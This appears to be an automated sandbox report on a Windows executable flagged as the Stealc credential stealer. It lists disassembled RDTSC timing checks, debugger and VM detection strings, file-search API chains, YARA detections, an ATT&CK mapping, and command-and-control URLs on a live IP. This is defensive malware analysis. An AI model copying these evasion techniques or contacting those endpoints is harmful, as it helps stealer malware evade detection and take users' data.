                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF97B second address: 5EF991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C6F730h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF991 second address: 5EF996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF996 second address: 5EF9A2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB438C6F72Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF9A2 second address: 5EF9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FB438CB0BFDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF9B7 second address: 5EF9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF9BB second address: 5EF9BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBF3A second address: 5FBF5D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB438C6F73Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBF5D second address: 5FBF61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBC8D second address: 5FBC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBC93 second address: 5FBC9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBC9D second address: 5FBCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBCA1 second address: 5FBCA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBCA5 second address: 5FBCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C37E second address: 60C382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C382 second address: 60C388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C388 second address: 60C391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C391 second address: 60C397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C397 second address: 60C3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB438CB0BF6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C3A7 second address: 60C3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FB438C6F72Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C851 second address: 60C85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnp 00007FB438CB0BF6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C85F second address: 60C863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C863 second address: 60C873 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB438CB0BF6h 0x00000008 jbe 00007FB438CB0BF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CC0C second address: 60CC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D171 second address: 60D1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438CB0BFCh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jbe 00007FB438CB0BF6h 0x00000015 popad 0x00000016 pop eax 0x00000017 pushad 0x00000018 jnp 00007FB438CB0C05h 0x0000001e jmp 00007FB438CB0BFDh 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 pushad 0x00000026 jmp 00007FB438CB0C05h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60D1BD second address: 60D1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FB438C6F732h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FD38 second address: 60FD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FD3C second address: 60FD40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60FDCA second address: 60FDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB438CB0BF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6100C4 second address: 6100D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C6F72Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6100D4 second address: 6100FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FB438CB0BF8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61041B second address: 61043A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB438C6F730h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61043A second address: 610445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB438CB0BF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6115C5 second address: 6115C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6115C9 second address: 6115D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB438CB0BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6115D5 second address: 6115F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FB438C6F726h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB438C6F732h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 614C31 second address: 614C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB438CB0C09h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 614C52 second address: 614C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED030A second address: 4ED0325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438CB0C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0423 second address: 4ED0427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0427 second address: 4ED042B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED042B second address: 4ED0431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0431 second address: 4ED044E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438CB0C09h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED044E second address: 4ED048C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FB438C6F739h 0x00000013 or ax, 2916h 0x00000018 jmp 00007FB438C6F731h 0x0000001d popfd 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536916 second address: 53691A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53691A second address: 536928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FB438C6F72Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 550B31 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5B2DA0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00134910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0012DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0012E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0012ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00134570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0012DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0012BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0012F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00133EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00133EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00121160 GetSystemInfo,ExitProcess,0_2_00121160
                Source: file.exe, file.exe, 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1817097974.0000000001054000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware}@
                Source: file.exe, 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1817097974.0000000001054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13527
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13530
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13549
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13541
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13581
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001245C0 VirtualProtect ?,00000004,00000100,000000000_2_001245C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00139860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139750 mov eax, dword ptr fs:[00000030h]0_2_00139750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00137850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00137850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00139600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00139600
                Source: file.exe, 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: file.exeBinary or memory string: Y Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00137B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00136920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00136920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00137850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00137850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00137A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00137A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.120000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1775667377.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.120000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1775667377.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7284, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37vlyfile.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/b5file.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpofile.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpvfile.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/wsfile.exe, 00000000.00000002.1817097974.0000000001037000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.php3file.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpsfile.exe, 00000000.00000002.1817097974.0000000001025000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1531077
                            Start date and time:2024-10-10 20:24:07 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 12s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:1
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
